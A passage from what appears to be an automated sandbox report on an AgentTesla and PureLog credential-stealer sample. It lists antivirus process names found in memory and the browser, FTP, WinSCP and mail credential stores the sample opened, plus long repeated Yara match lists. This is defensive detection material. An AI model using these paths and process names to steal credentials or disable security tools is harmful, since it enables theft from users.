Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031C920C GetLocalTime,

3_2_031C920C

Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

Code function: 13_2_0040BBD4 GetTimeZoneInformation,

13_2_0040BBD4

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031CB78C GetVersionExA,

3_2_031CB78C

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\Public\Libraries\xrbjyllC.pif

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Yara detected Credential Stealer

Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
